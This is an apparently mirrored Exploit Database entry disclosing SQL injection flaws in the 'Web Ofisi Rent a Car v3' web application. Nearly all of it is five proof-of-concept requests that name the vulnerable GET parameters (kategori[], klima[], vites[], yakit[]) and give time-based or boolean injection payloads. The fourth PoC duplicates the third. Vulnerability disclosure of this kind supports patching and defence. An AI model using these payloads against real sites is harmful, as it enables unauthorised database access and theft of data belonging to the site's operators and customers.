Web Ofisi Rent a Car 3 – ‘klima’ SQL Injection

• Exploit Database
• 15 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-07-19
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47144/

• # Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
  # Date: 2019-07-19
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
  # Demo Site: http://demobul.net/rentacarv3/
  # Version: v3
  # Tested on: Kali Linux
  # CVE: N/A
  
  ----- PoC 1: SQLi -----
  
  Request:
  http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
  Vulnerable Parameter: kategori[] (GET)
  Payload: if(now()=sysdate(),sleep(0),0)
  
  ----- PoC 2: SQLi -----
  
  Request:
  http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
  Vulnerable Parameter: klima[] (GET)
  Payload: 1 AND 3*2*1=6 AND 695=695
  
  ----- PoC 3: SQLi -----
  
  Request:
  http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
  Vulnerable Parameter: vites[] (GET)
  Payload: 1 AND 3*2*1=6 AND 499=499
  
  ----- PoC 4: SQLi -----
  
  Request:
  http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
  Vulnerable Parameter: vites[] (GET)
  Payload: 1 AND 3*2*1=6 AND 499=499
  
  ----- PoC 5: SQLi -----
  
  Request:
  http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
  Vulnerable Parameter: yakit[] (GET)
  Payload: 1 AND 3*2*1=6 AND 602=602